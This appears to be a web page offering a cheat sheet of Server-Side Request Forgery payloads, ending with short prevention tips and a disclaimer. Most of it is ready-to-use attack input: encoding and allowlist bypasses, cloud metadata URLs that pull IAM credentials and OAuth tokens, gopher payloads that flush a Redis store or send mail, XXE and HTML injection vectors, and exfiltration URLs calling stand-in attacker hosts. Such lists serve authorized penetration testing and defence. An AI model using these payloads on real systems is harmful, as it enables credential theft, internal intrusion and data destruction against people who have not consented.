Skip to content

SSRF (Server-Side Request Forgery) Payloads

Server-Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain. This can lead to unauthorized access to internal services, cloud metadata exposure, and network scanning.

Basic SSRF

Localhost Variations

http://localhost
http://127.0.0.1
http://127.1
http://0.0.0.0
http://[::]
http://0000::1
http://[::1]

Internal Network Scanning

http://192.168.0.1
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
http://169.254.169.254

Bypass Techniques

IP Address Obfuscation

Decimal Format

http://2130706433 (127.0.0.1)
http://3232235521 (192.168.0.1)
http://167772161 (10.0.0.1)

Octal Format

http://017700000001 (127.0.0.1)
http://0177.0.0.1
http://0x7f.0.0.1

Hexadecimal Format

http://0x7f000001 (127.0.0.1)
http://0x7f.0x0.0x0.0x1
http://0xc0a80001 (192.168.0.1)

Mixed Encoding

http://127.0.0.1
http://127.000.000.001
http://127.0.1
http://127.1

DNS-Based Bypass

http://localhost.company.com
http://127.0.0.1.nip.io
http://127.0.0.1.xip.io
http://evil.com (points to 127.0.0.1)
http://spoofed.burpcollaborator.net

URL Encoding

http://127.0.0.1
http://%31%32%37%2e%30%2e%30%2e%31
http://127.0.0.1%2F
http://127.0.0.1%00

Double URL Encoding

http://%32%35%32%37%32%25%32%65%32%35%33%30%32%35%32%65%32%35%33%30%32%35%32%65%32%35%33%31

Using @ Symbol

http://expected-host@evil-host
http://evil-host@expected-host
http://expected-host:ignored@evil-host
https://expected-host:fakepassword@evil-host

Using # Symbol

http://evil-host#expected-host
http://evil-host?@expected-host

Open Redirect Bypass

http://trusted-domain.com/redirect?url=http://169.254.169.254
http://trusted-domain.com/redirect?url=http://localhost

CRLF Injection

http://127.0.0.1%0d%0aHeader:%20value
http://example.com%0d%0a%0d%0a<script>alert(1)</script>

URL Fragments

http://evil.com\\.trusted.com
http://trusted.com.evil.com
http://trusted.com%252f@evil.com

Cloud Metadata

AWS

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/admin
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/dynamic/instance-identity/document

AWS IMDSv2 (Requires Token)

# First, get token
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`

# Then use token
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Header: X-aws-ec2-metadata-token: $TOKEN

Google Cloud

http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
http://metadata.google.internal/computeMetadata/v1/project/project-id
# Requires header: Metadata-Flavor: Google

http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
# Alternative header: X-Google-Meta-Request: True

Azure

http://169.254.169.254/metadata/instance?api-version=2021-02-01
# Requires header: Metadata: true

http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/

Digital Ocean

http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region

Oracle Cloud

http://169.254.169.254/opc/v1/instance/
http://169.254.169.254/opc/v1/instance/metadata/

Alibaba Cloud

http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/ram/security-credentials/

Port Scanning

http://localhost:22
http://localhost:80
http://localhost:443
http://localhost:3306
http://localhost:5432
http://localhost:6379
http://localhost:8080
http://localhost:8443
http://localhost:9200
http://127.0.0.1:1-65535 (iterate)

Protocol Handlers

File Protocol

file:///etc/passwd
file:///c:/windows/win.ini
file://\server\share\file.txt

Dict Protocol

dict://localhost:11211/stats
dict://127.0.0.1:6379/info

SFTP Protocol

sftp://localhost:22/

TFTP Protocol

tftp://localhost:69/file

LDAP Protocol

ldap://localhost:389
ldap://localhost:389/dc=example,dc=com

Gopher Protocol

gopher://localhost:80/_GET / HTTP/1.1
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a
gopher://localhost:25/_MAIL FROM:<attacker@evil.com>

SMB/UNC Paths (Windows)

\\localhost\c$\windows\win.ini
\\127.0.0.1\share
file://server/share

SSRF in Different Contexts

PDF Generation

<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/"></iframe>
<img src="http://localhost/admin">
<link rel="stylesheet" href="file:///etc/passwd">

XML Parsers

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<foo>&xxe;</foo>

SVG Files

<svg xmlns="http://www.w3.org/2000/svg">
<image href="http://169.254.169.254/latest/meta-data/"/>
</svg>

Video/Audio

<video src="http://localhost/admin"></video>
<audio src="http://169.254.169.254/latest/meta-data/"></audio>

Email (SMTP)

http://localhost:25/
gopher://localhost:25/_MAIL%20FROM:attacker@evil.com

Webhooks

{"url": "http://169.254.169.254/latest/meta-data/"}
{"webhook_url": "http://localhost:6379/"}

Blind SSRF

Time-Based Detection

http://169.254.169.254 (should respond quickly)
http://169.254.169.1 (may timeout)

DNS Exfiltration

http://attacker.burpcollaborator.net
http://collaborator.burpcollaborator.net
http://[data].attacker.com

Out-of-Band (OOB)

http://webhook.site/unique-id
http://requestbin.net/unique-id
http://attacker.com/?data=exfiltrated

Advanced SSRF

Bypassing Allowlists

http://allowed-domain.com@evil.com
http://evil.com#allowed-domain.com
http://allowed-domain.com.evil.com

Bypassing Blacklists

# If 127.0.0.1 is blocked
http://127.1
http://0.0.0.0
http://localhost
http://[::1]
http://2130706433

# If localhost is blocked
http://localtest.me
http://127.0.0.1.nip.io
http://0x7f000001

Redirect Chains

# Create a redirect on your server
http://evil.com/redirect → http://169.254.169.254/

DNS Rebinding

  1. Register domain with low TTL
  2. Initially resolves to allowed IP
  3. Change DNS to point to internal IP
  4. Application caches allowed IP, but makes request to internal IP

Prevention Best Practices

  1. Input Validation: Validate and sanitize all URLs
  2. Allowlist: Use allowlists for permitted domains/IPs
  3. Network Segmentation: Isolate sensitive services
  4. Disable Unused Protocols: Disable file://, gopher://, etc.
  5. Authentication: Require authentication for internal services
  6. Response Validation: Check response content type and size
  7. Egress Filtering: Block outbound requests to private IP ranges
  8. Use Libraries Safely: Configure HTTP clients securely

Testing Tools

  • SSRFmap - Automated SSRF testing
  • Burp Collaborator - Out-of-band testing
  • Interactsh - OOB interaction server
  • Gopherus - Gopher protocol payload generator
  • SSRFTest - SSRF detection tool

⚠️ Warning: These payloads are for educational and authorized security testing purposes only. Unauthorized use is illegal.